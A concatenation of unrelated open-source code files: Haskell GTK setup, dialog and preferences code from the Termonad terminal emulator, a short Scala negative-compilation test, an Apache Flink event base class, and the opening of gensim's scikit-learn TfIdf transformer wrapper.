compareScrolledWinAndTab :: ScrolledWindow -> TMNotebookTab -> Bool
compareScrolledWinAndTab scrollWin flTab =
  let ScrolledWindow managedPtrFLTab = tmNotebookTabTermContainer flTab
      foreignPtrFLTab = managedForeignPtr managedPtrFLTab
      ScrolledWindow managedPtrScrollWin = scrollWin
      foreignPtrScrollWin = managedForeignPtr managedPtrScrollWin
  in foreignPtrFLTab == foreignPtrScrollWin
-- | Move a tab from one position to another in the state's 'FocusList',
-- mirroring a drag-reorder that already happened in the GTK notebook.
-- If the move is impossible (positions out of range) the state is left
-- unchanged and a diagnostic is printed.
updateFLTabPos :: TMState -> Int -> Int -> IO ()
updateFLTabPos mvarTMState oldPos newPos =
  modifyMVar_ mvarTMState $ \tmState -> do
    let tabs = tmState ^. lensTMStateNotebook . lensTMNotebookTabs
        maybeNewTabs = moveFromToFL oldPos newPos tabs
    case maybeNewTabs of
      Nothing -> do
        putStrLn $
          "in updateFLTabPos, Strange error: couldn't move tabs.\n" <>
          "old pos: " <> tshow oldPos <> "\n" <>
          "new pos: " <> tshow newPos <> "\n" <>
          "tabs: " <> tshow tabs <> "\n" <>
          "maybeNewTabs: " <> tshow maybeNewTabs <> "\n" <>
          "tmState: " <> tshow tmState
        pure tmState
      Just newTabs ->
        pure $
          tmState &
            lensTMStateNotebook . lensTMNotebookTabs .~ newTabs
-- | Try to figure out whether Termonad should exit. This also used to figure
-- out if Termonad should close a given terminal.
--
-- This reads the 'confirmExit' setting from 'ConfigOptions' to check whether
-- the user wants to be notified when either Termonad or a given terminal is
-- about to be closed.
--
-- If 'confirmExit' is 'True', then a dialog is presented to the user asking
-- them if they really want to exit or close the terminal. Their response is
-- sent back as a 'ResponseType'.
--
-- If 'confirmExit' is 'False', then this function always returns
-- 'ResponseTypeYes'.
askShouldExit :: TMState -> IO ResponseType
askShouldExit mvarTMState = do
  tmState <- readMVar mvarTMState
  -- Only prompt when the user enabled confirm-on-exit in the config.
  let confirm = tmState ^. lensTMStateConfig . lensOptions . lensConfirmExit
  if confirm
    then confirmationDialogForExit tmState
    else pure ResponseTypeYes
  where
    -- Show the user a dialog telling them there are still terminals running and
    -- asking if they really want to exit.
    --
    -- Return the user's resposne as a 'ResponseType'.
    confirmationDialogForExit :: TMState' -> IO ResponseType
    confirmationDialogForExit tmState = do
      let app = tmState ^. lensTMStateApp
      win <- applicationGetActiveWindow app
      dialog <- dialogNew
      box <- dialogGetContentArea dialog
      label <-
        labelNew $
          Just
            "There are still terminals running. Are you sure you want to exit?"
      containerAdd box label
      widgetShow label
      setWidgetMargin label 10
      void $
        dialogAddButton
          dialog
          "No, do NOT exit"
          (fromIntegral (fromEnum ResponseTypeNo))
      void $
        dialogAddButton
          dialog
          "Yes, exit"
          (fromIntegral (fromEnum ResponseTypeYes))
      -- Keep the dialog on top of the main window, run it modally, and
      -- destroy it before translating the numeric response back into a
      -- 'ResponseType'.
      windowSetTransientFor dialog win
      res <- dialogRun dialog
      widgetDestroy dialog
      pure $ toEnum (fromIntegral res)
-- | Force Termonad to exit without asking the user whether or not to do so.
--
-- Reads the 'Application' out of the shared state and calls the GTK
-- quit action on it directly.
forceQuit :: TMState -> IO ()
forceQuit mvarTMState = do
  tmState <- readMVar mvarTMState
  let app = tmState ^. lensTMStateApp
  applicationQuit app
setupTermonad :: TMConfig -> Application -> ApplicationWindow -> Gtk.Builder -> IO ()
-- | Wire together the main Termonad UI: the window icon, CSS, the terminal
-- notebook and its callbacks, the initial terminal, all application actions
-- (with their keyboard accelerators), the menu bar, and the
-- quit-confirmation handler for the window manager's close request.
--
-- NOTE(review): the ordering of these setup steps looks significant (the
-- first terminal is created before the notebook callbacks are installed);
-- confirm before reordering.
setupTermonad tmConfig app win builder = do
  termonadIconPath <- getDataFileName "img/termonad-lambda.png"
  windowSetDefaultIconFromFile termonadIconPath
  setupScreenStyle
  box <- objFromBuildUnsafe builder "content_box" Box
  fontDesc <- createFontDescFromConfig tmConfig
  note <- notebookNew
  widgetSetCanFocus note False
  -- If this is not set to False, then there will be a one pixel white border
  -- shown around the notebook.
  notebookSetShowBorder note False
  boxPackStart box note True True 0
  mvarTMState <- newEmptyTMState tmConfig app win note fontDesc
  terminal <- createTerm handleKeyPress mvarTMState
  -- When the last tab is closed, quit the whole application; otherwise just
  -- recompute whether the tab bar should be visible.
  void $ onNotebookPageRemoved note $ \_ _ -> do
    pages <- notebookGetNPages note
    if pages == 0
      then forceQuit mvarTMState
      else setShowTabs tmConfig note
  -- Keep the FocusList of tabs in sync with the notebook's current page and
  -- move keyboard focus into the newly selected tab's terminal.
  void $ onNotebookSwitchPage note $ \_ pageNum -> do
    modifyMVar_ mvarTMState $ \tmState -> do
      let notebook = tmStateNotebook tmState
          tabs = tmNotebookTabs notebook
          maybeNewTabs = updateFocusFL (fromIntegral pageNum) tabs
      case maybeNewTabs of
        Nothing -> pure tmState
        Just (tab, newTabs) -> do
          widgetGrabFocus $ tab ^. lensTMNotebookTabTerm . lensTerm
          pure $
            tmState &
              lensTMStateNotebook . lensTMNotebookTabs .~ newTabs
  -- When the user drags a tab to a new position, mirror the move in the
  -- FocusList and renumber the tab labels.
  void $ onNotebookPageReordered note $ \childWidg pageNum -> do
    maybeScrollWin <- castTo ScrolledWindow childWidg
    case maybeScrollWin of
      Nothing ->
        fail $
          "In setupTermonad, in callback for onNotebookPageReordered, " <>
          "child widget is not a ScrolledWindow.\n" <>
          "Don't know how to continue.\n"
      Just scrollWin -> do
        TMState{tmStateNotebook} <- readMVar mvarTMState
        let fl = tmStateNotebook ^. lensTMNotebookTabs
        let maybeOldPosition =
              findIndexR (compareScrolledWinAndTab scrollWin) (focusList fl)
        case maybeOldPosition of
          Nothing ->
            fail $
              "In setupTermonad, in callback for onNotebookPageReordered, " <>
              "the ScrolledWindow is not already in the FocusList.\n" <>
              "Don't know how to continue.\n"
          Just oldPos -> do
            updateFLTabPos mvarTMState oldPos (fromIntegral pageNum)
            relabelTabs mvarTMState
  -- Application actions; each action is registered on the Application and
  -- then bound to a keyboard accelerator.
  newTabAction <- simpleActionNew "newtab" Nothing
  void $ onSimpleActionActivate newTabAction $ \_ -> void $ createTerm handleKeyPress mvarTMState
  actionMapAddAction app newTabAction
  applicationSetAccelsForAction app "app.newtab" ["<Shift><Ctrl>T"]
  closeTabAction <- simpleActionNew "closetab" Nothing
  void $ onSimpleActionActivate closeTabAction $ \_ ->
    termExitFocused mvarTMState
  actionMapAddAction app closeTabAction
  applicationSetAccelsForAction app "app.closetab" ["<Shift><Ctrl>W"]
  quitAction <- simpleActionNew "quit" Nothing
  void $ onSimpleActionActivate quitAction $ \_ -> do
    shouldExit <- askShouldExit mvarTMState
    when (shouldExit == ResponseTypeYes) $ forceQuit mvarTMState
  actionMapAddAction app quitAction
  applicationSetAccelsForAction app "app.quit" ["<Shift><Ctrl>Q"]
  copyAction <- simpleActionNew "copy" Nothing
  void $ onSimpleActionActivate copyAction $ \_ -> do
    maybeTerm <- getFocusedTermFromState mvarTMState
    maybe (pure ()) terminalCopyClipboard maybeTerm
  actionMapAddAction app copyAction
  applicationSetAccelsForAction app "app.copy" ["<Shift><Ctrl>C"]
  pasteAction <- simpleActionNew "paste" Nothing
  void $ onSimpleActionActivate pasteAction $ \_ -> do
    maybeTerm <- getFocusedTermFromState mvarTMState
    maybe (pure ()) terminalPasteClipboard maybeTerm
  actionMapAddAction app pasteAction
  applicationSetAccelsForAction app "app.paste" ["<Shift><Ctrl>V"]
  preferencesAction <- simpleActionNew "preferences" Nothing
  void $ onSimpleActionActivate preferencesAction (const $ showPreferencesDialog mvarTMState)
  actionMapAddAction app preferencesAction
  enlargeFontAction <- simpleActionNew "enlargefont" Nothing
  void $ onSimpleActionActivate enlargeFontAction $ \_ ->
    modifyFontSizeForAllTerms (modFontSize 1) mvarTMState
  actionMapAddAction app enlargeFontAction
  applicationSetAccelsForAction app "app.enlargefont" ["<Ctrl>plus"]
  reduceFontAction <- simpleActionNew "reducefont" Nothing
  void $ onSimpleActionActivate reduceFontAction $ \_ ->
    modifyFontSizeForAllTerms (modFontSize (-1)) mvarTMState
  actionMapAddAction app reduceFontAction
  applicationSetAccelsForAction app "app.reducefont" ["<Ctrl>minus"]
  findAction <- simpleActionNew "find" Nothing
  void $ onSimpleActionActivate findAction $ \_ -> doFind mvarTMState
  actionMapAddAction app findAction
  applicationSetAccelsForAction app "app.find" ["<Shift><Ctrl>F"]
  findAboveAction <- simpleActionNew "findabove" Nothing
  void $ onSimpleActionActivate findAboveAction $ \_ -> findAbove mvarTMState
  actionMapAddAction app findAboveAction
  applicationSetAccelsForAction app "app.findabove" ["<Shift><Ctrl>P"]
  findBelowAction <- simpleActionNew "findbelow" Nothing
  void $ onSimpleActionActivate findBelowAction $ \_ -> findBelow mvarTMState
  actionMapAddAction app findBelowAction
  applicationSetAccelsForAction app "app.findbelow" ["<Shift><Ctrl>I"]
  aboutAction <- simpleActionNew "about" Nothing
  void $ onSimpleActionActivate aboutAction $ \_ -> showAboutDialog app
  actionMapAddAction app aboutAction
  -- Menu bar, built from the bundled menu definition.
  menuBuilder <- builderNewFromString menuText $ fromIntegral (length menuText)
  menuModel <- objFromBuildUnsafe menuBuilder "menubar" MenuModel
  applicationSetMenubar app (Just menuModel)
  let showMenu = tmConfig ^. lensOptions . lensShowMenu
  applicationWindowSetShowMenubar win showMenu
  windowSetTitle win "Termonad"
  -- This event will happen if the user requests that the top-level Termonad
  -- window be closed through their window manager. It will also happen
  -- normally when the user tries to close Termonad through normal methods,
  -- like clicking "Quit" or closing the last open terminal.
  --
  -- If you return 'True' from this callback, then Termonad will not exit.
  -- If you return 'False' from this callback, then Termonad will continue to
  -- exit.
  void $ onWidgetDeleteEvent win $ \_ -> do
    shouldExit <- askShouldExit mvarTMState
    pure $
      case shouldExit of
        ResponseTypeYes -> False
        _ -> True
  widgetShowAll win
  widgetGrabFocus $ terminal ^. lensTerm
-- | GTK application \"activate\" handler: build the top-level window from
-- the bundled UI definition, attach it to the 'Application', run the main
-- UI setup in 'setupTermonad', and present the window.
appActivate :: TMConfig -> Application -> IO ()
appActivate tmConfig app = do
  uiBuilder <-
    builderNewFromString interfaceText $ fromIntegral (length interfaceText)
  builderSetApplication uiBuilder app
  appWin <- objFromBuildUnsafe uiBuilder "appWin" ApplicationWindow
  applicationAddWindow app appWin
  setupTermonad tmConfig app appWin uiBuilder
  windowPresent appWin
-- | Show the stock GTK about dialog, modal over the currently active
-- window, and destroy it once it has been dismissed.
showAboutDialog :: Application -> IO ()
showAboutDialog app = do
  win <- applicationGetActiveWindow app
  aboutDialog <- aboutDialogNew
  windowSetTransientFor aboutDialog win
  void $ dialogRun aboutDialog
  widgetDestroy aboutDialog
-- | Pop up a modal dialog asking the user for a search regex.
--
-- Returns 'Just' the entered text when the user confirms (by pressing
-- Enter in the entry or clicking the \"Find\" button), and 'Nothing' when
-- the dialog is dismissed via \"Close\".
showFindDialog :: Application -> IO (Maybe Text)
showFindDialog app = do
  win <- applicationGetActiveWindow app
  dialog <- dialogNew
  box <- dialogGetContentArea dialog
  grid <- gridNew
  searchForLabel <- labelNew (Just "Search for regex:")
  containerAdd grid searchForLabel
  widgetShow searchForLabel
  setWidgetMargin searchForLabel 10
  searchEntry <- entryNew
  gridAttachNextTo grid searchEntry (Just searchForLabel) PositionTypeRight 1 1
  widgetShow searchEntry
  setWidgetMargin searchEntry 10
  -- setWidgetMarginBottom searchEntry 20
  -- Pressing Enter in the entry behaves the same as clicking "Find".
  void $
    onEntryActivate searchEntry $
      dialogResponse dialog (fromIntegral (fromEnum ResponseTypeYes))
  void $
    dialogAddButton
      dialog
      "Close"
      (fromIntegral (fromEnum ResponseTypeNo))
  void $
    dialogAddButton
      dialog
      "Find"
      (fromIntegral (fromEnum ResponseTypeYes))
  containerAdd box grid
  widgetShow grid
  windowSetTransientFor dialog win
  res <- dialogRun dialog
  searchString <- entryGetText searchEntry
  -- Only a "Find" (ResponseTypeYes) response yields a search string.
  let maybeSearchString =
        case toEnum (fromIntegral res) of
          ResponseTypeYes -> Just searchString
          _ -> Nothing
  widgetDestroy dialog
  pure maybeSearchString
-- | Ask the user for a regex via 'showFindDialog' and, when a regex was
-- entered and a terminal is focused, install it as that terminal's search
-- regex and jump to the previous (upward) match.  Does nothing otherwise.
doFind :: TMState -> IO ()
doFind mvarTMState = do
  tmState <- readMVar mvarTMState
  let app = tmStateApp tmState
  maybeSearchString <- showFindDialog app
  -- putStrLn $ "trying to find: " <> tshow maybeSearchString
  maybeTerminal <- getFocusedTermFromState mvarTMState
  case (maybeSearchString, maybeTerminal) of
    (Just searchString, Just terminal) -> do
      -- TODO: Figure out how to import the correct pcre flags.
      --
      -- If you don't pass the pcre2Multiline flag, VTE gives
      -- the following warning:
      --
      -- (termonad-linux-x86_64:18792): Vte-WARNING **:
      -- 21:56:31.193: (vtegtk.cc:2269):void
      -- vte_terminal_search_set_regex(VteTerminal*,
      -- VteRegex*, guint32): runtime check failed:
      -- (regex == nullptr ||
      -- _vte_regex_get_compile_flags(regex) & PCRE2_MULTILINE)
      --
      -- However, if you do add the pcre2Multiline flag,
      -- the terminalSearchSetRegex appears to just completely
      -- not work.
      let pcreFlags = 0
      let newRegex =
            regexNewForSearch
              searchString
              (fromIntegral $ length searchString)
              pcreFlags
      -- Regex compilation can fail (e.g. on malformed patterns); surface
      -- the error on stderr instead of crashing.
      eitherRegex <-
        catchRegexError
          (fmap Right newRegex)
          (\_ errMsg -> pure (Left errMsg))
      case eitherRegex of
        Left errMsg -> do
          let msg = "error when creating regex: " <> errMsg
          hPutStrLn stderr msg
        Right regex -> do
          terminalSearchSetRegex terminal (Just regex) pcreFlags
          terminalSearchSetWrapAround terminal True
          _matchFound <- terminalSearchFindPrevious terminal
          -- TODO: Setup an actual logging framework to show these
          -- kinds of log messages.  Also make a similar change in
          -- findAbove and findBelow.
          -- putStrLn $ "was match found: " <> tshow matchFound
          pure ()
    _ -> pure ()
-- | Jump to the previous (upward) match of the search regex previously
-- installed by 'doFind'.  Does nothing when no terminal is focused.
findAbove :: TMState -> IO ()
findAbove mvarTMState = do
  maybeTerminal <- getFocusedTermFromState mvarTMState
  -- The match-found Bool is intentionally discarded; see the logging TODO
  -- in 'doFind'.
  maybe (pure ()) (void . terminalSearchFindPrevious) maybeTerminal
-- | Jump to the next (downward) match of the search regex previously
-- installed by 'doFind'.  Does nothing when no terminal is focused.
findBelow :: TMState -> IO ()
findBelow mvarTMState = do
  maybeTerminal <- getFocusedTermFromState mvarTMState
  -- The match-found Bool is intentionally discarded; see the logging TODO
  -- in 'doFind'.
  maybe (pure ()) (void . terminalSearchFindNext) maybeTerminal
-- | Show or hide the menu bar of the application's currently active
-- window.  Silently does nothing when there is no active window, or when
-- the active window cannot be cast to an 'ApplicationWindow'.
setShowMenuBar :: Application -> Bool -> IO ()
setShowMenuBar app visible = do
  void $ runMaybeT $ do
    win <- MaybeT $ applicationGetActiveWindow app
    appWin <- MaybeT $ castTo ApplicationWindow win
    lift $ applicationWindowSetShowMenubar appWin visible
-- | Populate a combo box from a list of (id, label) pairs.
--
-- Each id is rendered with 'tshow' and stored in the combo box as 'Text',
-- which is why the id type must have a 'Show' instance.
comboBoxFill :: forall a. Show a => ComboBoxText -> [(a, Text)] -> IO ()
comboBoxFill comboBox entries =
  mapM_
    (\(value, label) -> comboBoxTextAppend comboBox (Just (tshow value)) label)
    entries
-- | Make @item@ the selected entry of a combo box.
--
-- The lookup uses the same 'tshow'-derived id that 'comboBoxFill' stored.
comboBoxSetActive :: Show a => ComboBoxText -> a -> IO ()
comboBoxSetActive cb item =
  void (comboBoxSetActiveId cb (Just (tshow item)))
-- | Read back the currently selected item of a combo box.
--
-- The candidate @values@ are rendered with 'tshow' and compared against
-- the combo box's active id.  Returns 'Nothing' when there is no active
-- selection, or when the active id matches none of the candidates.
comboBoxGetActive
  :: forall a. (Show a, Enum a) => ComboBoxText -> [a] -> IO (Maybe a)
comboBoxGetActive cb values = do
  maybeId <- comboBoxGetActiveId cb
  pure $ do
    activeId <- maybeId
    find (\candidate -> tshow candidate == activeId) values
-- | Push the current 'TMConfig' settings out to the running UI: menu-bar
-- visibility, tab-bar visibility, and the per-tab terminal settings (via
-- 'applyNewPreferencesToTab' on every open tab).
applyNewPreferences :: TMState -> IO ()
applyNewPreferences mvarTMState = do
  tmState <- readMVar mvarTMState
  let appWin = tmState ^. lensTMStateAppWin
      config = tmState ^. lensTMStateConfig
      notebook = tmState ^. lensTMStateNotebook ^. lensTMNotebook
      tabFocusList = tmState ^. lensTMStateNotebook ^. lensTMNotebookTabs
      showMenu = config ^. lensOptions ^. lensShowMenu
  applicationWindowSetShowMenubar appWin showMenu
  setShowTabs config notebook
  -- Sets the remaining preferences to each tab
  foldMap (applyNewPreferencesToTab mvarTMState) tabFocusList
-- | Apply the font and terminal options held in 'TMState' to a single
-- notebook tab: font, cursor blink mode, word-char exceptions, scrollback
-- length, and the vertical scrollbar policy of the tab's container.
applyNewPreferencesToTab :: TMState -> TMNotebookTab -> IO ()
applyNewPreferencesToTab mvarTMState tab = do
  tmState <- readMVar mvarTMState
  let fontDesc = tmState ^. lensTMStateFontDesc
      term = tab ^. lensTMNotebookTabTerm ^. lensTerm
      scrolledWin = tab ^. lensTMNotebookTabTermContainer
      options = tmState ^. lensTMStateConfig ^. lensOptions
  terminalSetFont term (Just fontDesc)
  terminalSetCursorBlinkMode term (options ^. lensCursorBlinkMode)
  terminalSetWordCharExceptions term (options ^. lensWordCharExceptions)
  terminalSetScrollbackLines term (fromIntegral (options ^. lensScrollbackLen))
  -- Horizontal scrolling is always automatic; only the vertical policy is
  -- configurable.
  let vScrollbarPolicy = showScrollbarToPolicy (options ^. lensShowScrollbar)
  scrolledWindowSetPolicy scrolledWin PolicyTypeAutomatic vScrollbarPolicy
-- | Show the preferences dialog.
--
-- When the user clicks on the Ok button, it copies the new settings to TMState.
-- Then apply them to the current terminals.
showPreferencesDialog :: TMState -> IO ()
showPreferencesDialog mvarTMState = do
  -- Get app out of mvar
  tmState <- readMVar mvarTMState
  let app = tmState ^. lensTMStateApp
  -- Create the preference dialog and get some widgets
  preferencesBuilder <-
    builderNewFromString preferencesText $ fromIntegral (length preferencesText)
  preferencesDialog <-
    objFromBuildUnsafe preferencesBuilder "preferences" Dialog
  confirmExitCheckButton <-
    objFromBuildUnsafe preferencesBuilder "confirmExit" CheckButton
  showMenuCheckButton <-
    objFromBuildUnsafe preferencesBuilder "showMenu" CheckButton
  wordCharExceptionsEntryBuffer <-
    objFromBuildUnsafe preferencesBuilder "wordCharExceptions" Entry >>=
      getEntryBuffer
  fontButton <- objFromBuildUnsafe preferencesBuilder "font" FontButton
  showScrollbarComboBoxText <-
    objFromBuildUnsafe preferencesBuilder "showScrollbar" ComboBoxText
  comboBoxFill
    showScrollbarComboBoxText
    [ (ShowScrollbarNever, "Never")
    , (ShowScrollbarAlways, "Always")
    , (ShowScrollbarIfNeeded, "If needed")
    ]
  showTabBarComboBoxText <-
    objFromBuildUnsafe preferencesBuilder "showTabBar" ComboBoxText
  comboBoxFill
    showTabBarComboBoxText
    [ (ShowTabBarNever, "Never")
    , (ShowTabBarAlways, "Always")
    , (ShowTabBarIfNeeded, "If needed")
    ]
  cursorBlinkModeComboBoxText <-
    objFromBuildUnsafe preferencesBuilder "cursorBlinkMode" ComboBoxText
  comboBoxFill
    cursorBlinkModeComboBoxText
    [ (CursorBlinkModeSystem, "System")
    , (CursorBlinkModeOn, "On")
    , (CursorBlinkModeOff, "Off")
    ]
  scrollbackLenSpinButton <-
    objFromBuildUnsafe preferencesBuilder "scrollbackLen" SpinButton
  adjustmentNew 0 0 (fromIntegral (maxBound :: Int)) 1 10 0 >>=
    spinButtonSetAdjustment scrollbackLenSpinButton
  warningLabel <- objFromBuildUnsafe preferencesBuilder "warning" Label
  -- We show the warning label only if the user has launched termonad with a
  -- termonad.hs file
  executablePath <- getExecutablePath
  let hasTermonadHs = takeFileName executablePath == "termonad-linux-x86_64"
  widgetSetVisible warningLabel hasTermonadHs
  -- Make the dialog modal
  maybeWin <- applicationGetActiveWindow app
  windowSetTransientFor preferencesDialog maybeWin
  -- Init with current state
  fontChooserSetFontDesc fontButton (tmState ^. lensTMStateFontDesc)
  let options = tmState ^. lensTMStateConfig . lensOptions
  comboBoxSetActive showScrollbarComboBoxText $ options ^. lensShowScrollbar
  comboBoxSetActive showTabBarComboBoxText $ options ^. lensShowTabBar
  comboBoxSetActive cursorBlinkModeComboBoxText $ options ^. lensCursorBlinkMode
  spinButtonSetValue
    scrollbackLenSpinButton
    (fromIntegral $ options ^. lensScrollbackLen)
  toggleButtonSetActive confirmExitCheckButton $ options ^. lensConfirmExit
  toggleButtonSetActive showMenuCheckButton $ options ^. lensShowMenu
  -- The (-1) length asks GTK to measure the supplied text itself.
  entryBufferSetText
    wordCharExceptionsEntryBuffer
    (options ^. lensWordCharExceptions)
    (-1)
  -- Run dialog then close
  res <- dialogRun preferencesDialog
  -- When closing the dialog get the new settings; anything other than an
  -- Accept response discards the edits.
  when (toEnum (fromIntegral res) == ResponseTypeAccept) $ do
    maybeFontDesc <- fontChooserGetFontDesc fontButton
    maybeFontConfig <-
      liftM join $ mapM fontConfigFromFontDescription maybeFontDesc
    maybeShowScrollbar <-
      comboBoxGetActive showScrollbarComboBoxText [ShowScrollbarNever ..]
    maybeShowTabBar <-
      comboBoxGetActive showTabBarComboBoxText [ShowTabBarNever ..]
    maybeCursorBlinkMode <-
      comboBoxGetActive cursorBlinkModeComboBoxText [CursorBlinkModeSystem ..]
    scrollbackLen <-
      fromIntegral <$> spinButtonGetValueAsInt scrollbackLenSpinButton
    confirmExit <- toggleButtonGetActive confirmExitCheckButton
    showMenu <- toggleButtonGetActive showMenuCheckButton
    wordCharExceptions <- entryBufferGetText wordCharExceptionsEntryBuffer
    -- Apply the changes to mvarTMState.  Fields whose widget value could
    -- not be read back (the Maybe results above) keep their old value.
    modifyMVar_ mvarTMState $ pure
      . over lensTMStateFontDesc (`fromMaybe` maybeFontDesc)
      . over (lensTMStateConfig . lensOptions)
        ( set lensConfirmExit confirmExit
        . set lensShowMenu showMenu
        . set lensWordCharExceptions wordCharExceptions
        . over lensFontConfig (`fromMaybe` maybeFontConfig)
        . set lensScrollbackLen scrollbackLen
        . over lensShowScrollbar (`fromMaybe` maybeShowScrollbar)
        . over lensShowTabBar (`fromMaybe` maybeShowTabBar)
        . over lensCursorBlinkMode (`fromMaybe` maybeCursorBlinkMode)
        )
    -- Save the changes to the preferences files
    withMVar mvarTMState $ saveToPreferencesFile . view lensTMStateConfig
    -- Update the app with new settings
    applyNewPreferences mvarTMState
  widgetDestroy preferencesDialog
-- | GTK application \"startup\" handler.  Termonad does all of its real
-- setup in 'appActivate', so this is intentionally a no-op.
appStartup :: Application -> IO ()
appStartup _app = pure ()
-- | Run Termonad with the given 'TMConfig'.
--
-- Do not perform any of the recompilation operations that the 'defaultMain'
-- function does.
start :: TMConfig -> IO ()
start tmConfig = do
  -- app <- appNew (Just "haskell.termonad") [ApplicationFlagsFlagsNone]
  -- Make sure the application is not unique, so we can open multiple copies of it.
  app <- appNew Nothing [ApplicationFlagsFlagsNone]
  void $ onApplicationStartup app (appStartup app)
  void $ onApplicationActivate app (appActivate tmConfig app)
  -- Runs the GTK main loop; this call does not return until the
  -- application quits.
  void $ applicationRun app Nothing
-- | Run Termonad with the given 'TMConfig'.
--
-- This function will check if there is a @~\/.config\/termonad\/termonad.hs@ file
-- and a @~\/.cache\/termonad\/termonad-linux-x86_64@ binary.  Termonad will
-- perform different actions based on whether or not these two files exist.
--
-- Here are the four different possible actions based on the existence of these
-- two files.
--
-- - @~\/.config\/termonad\/termonad.hs@ exists, @~\/.cache\/termonad\/termonad-linux-x86_64@ exists
--
--     The timestamps of these two files are checked.  If the
--     @~\/.config\/termonad\/termonad.hs@ file has been modified after the
--     @~\/.cache\/termonad\/termonad-linux-x86_64@ binary, then Termonad will use
--     GHC to recompile the @~\/.config\/termonad\/termonad.hs@ file, producing a
--     new binary at @~\/.cache\/termonad\/termonad-linux-x86_64@.  This new binary
--     will be re-executed.  The 'TMConfig' passed to this 'defaultMain' will be
--     effectively thrown away.
--
--     If GHC fails to recompile the @~\/.config\/termonad\/termonad.hs@ file, then
--     Termonad will just execute 'start' with the 'TMConfig' passed in.
--
--     If the @~\/.cache\/termonad\/termonad-linux-x86_64@ binary has been modified
--     after the @~\/.config\/termonad\/termonad.hs@ file, then Termonad will
--     re-exec the @~\/.cache\/termonad\/termonad-linux-x86_64@ binary.  The
--     'TMConfig' passed to this 'defaultMain' will be effectively thrown away.
--
-- - @~\/.config\/termonad\/termonad.hs@ exists, @~\/.cache\/termonad\/termonad-linux-x86_64@ does not exist
--
--     Termonad will use GHC to recompile the @~\/.config\/termonad\/termonad.hs@
--     file, producing a new binary at @~\/.cache\/termonad\/termonad-linux-x86_64@.
--     This new binary will be re-executed.  The 'TMConfig' passed to this
--     'defaultMain' will be effectively thrown away.
--
--     If GHC fails to recompile the @~\/.config\/termonad\/termonad.hs@ file, then
--     Termonad will just execute 'start' with the 'TMConfig' passed in.
--
-- - @~\/.config\/termonad\/termonad.hs@ does not exist, @~\/.cache\/termonad\/termonad-linux-x86_64@ exists
--
--     Termonad will ignore the @~\/.cache\/termonad\/termonad-linux-x86_64@ binary
--     and just run 'start' with the 'TMConfig' passed to this function.
--
-- - @~\/.config\/termonad\/termonad.hs@ does not exist, @~\/.cache\/termonad\/termonad-linux-x86_64@ does not exist
--
--     Termonad will run 'start' with the 'TMConfig' passed to this function.
--
-- Other notes:
--
-- 1. That the locations of @~\/.config\/termonad\/termonad.hs@ and
--    @~\/.cache\/termonad\/termonad-linux-x86_64@ may differ depending on your
--    system.
--
-- 2. In your own @~\/.config\/termonad\/termonad.hs@ file, you can use either
--    'defaultMain' or 'start'.  As long as you always execute the system-wide
--    @termonad@ binary (instead of the binary produced as
--    @~\/.cache\/termonad\/termonad-linux-x86_64@), the effect should be the same.
defaultMain :: TMConfig -> IO ()
defaultMain tmConfig = do
  let params =
        defaultParams
          { projectName = "termonad"
          -- Accumulate recompilation errors; realMain prints them before
          -- starting the UI.
          , showError = \(cfg, oldErrs) newErr -> (cfg, oldErrs <> "\n" <> newErr)
          , realMain = \(cfg, errs) -> putStrLn (pack errs) *> start cfg
          }
  eitherRes <- tryIOError $ wrapMain params (tmConfig, "")
  case eitherRes of
    Left ioErr
      -- A missing "ghc" executable is a normal situation for users who have
      -- a termonad.hs but no compiler; fall back to the compiled-in config.
      | ioeGetErrorType ioErr == doesNotExistErrorType && ioeGetFileName ioErr == Just "ghc" -> do
        putStrLn $
          "Could not find ghc on your PATH. Ignoring your termonad.hs " <>
          "configuration file and running termonad with default settings."
        start tmConfig
      | otherwise -> do
        putStrLn $ "IO error occurred when trying to run termonad:"
        print ioErr
        putStrLn "Don't know how to recover. Exiting."
    Right _ -> pure ()
| {
"pile_set_name": "Github"
} |
// Negative compilation test: declaring `wait()` in a trait clashes with the
// method inherited from java.lang.Object, so the compiler is expected to
// report an error on the line carrying the `// error` marker.
trait SAMTrait:
  def first(): String
  def wait(): Unit // error
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.flink.runtime.event;
import org.apache.flink.core.io.IOReadableWritable;
import org.apache.flink.runtime.taskexecutor.TaskExecutor;
/**
 * This type of event can be used to exchange notification messages between
 * different {@link TaskExecutor} objects at runtime using the communication
 * channels.
 *
 * <p>This base class carries no state of its own; concrete events supply
 * their payload and its serialization via the {@link IOReadableWritable}
 * contract.
 */
public abstract class AbstractEvent implements IOReadableWritable {}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Radim Rehurek <[email protected]>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""Scikit learn interface for :class:`~gensim.models.tfidfmodel.TfidfModel`.
Follows scikit-learn API conventions to facilitate using gensim along with scikit-learn.
Examples
--------
.. sourcecode:: pycon
>>> from gensim.test.utils import common_corpus, common_dictionary
>>> from gensim.sklearn_api import TfIdfTransformer
>>>
>>> # Transform the word counts inversely to their global frequency using the sklearn interface.
>>> model = TfIdfTransformer(dictionary=common_dictionary)
>>> tfidf_corpus = model.fit_transform(common_corpus)
"""
from sklearn.base import TransformerMixin, BaseEstimator
from sklearn.exceptions import NotFittedError
from gensim.models import TfidfModel
import gensim
class TfIdfTransformer(TransformerMixin, BaseEstimator):
    """Base TfIdf module, wraps :class:`~gensim.models.tfidfmodel.TfidfModel`.
    For more information please have a look to `tf-idf <https://en.wikipedia.org/wiki/Tf%E2%80%93idf>`_.
    """
    def __init__(self, id2word=None, dictionary=None, wlocal=gensim.utils.identity,
                 wglobal=gensim.models.tfidfmodel.df2idf, normalize=True, smartirs="nfc",
                 pivot=None, slope=0.65):
        """
        Parameters
        ----------
        id2word : {dict, :class:`~gensim.corpora.Dictionary`}, optional
            Mapping from int id to word token, that was used for converting input data to bag of words format.
        dictionary : :class:`~gensim.corpora.Dictionary`, optional
            If specified it will be used to directly construct the inverse document frequency mapping.
        wlocals : function, optional
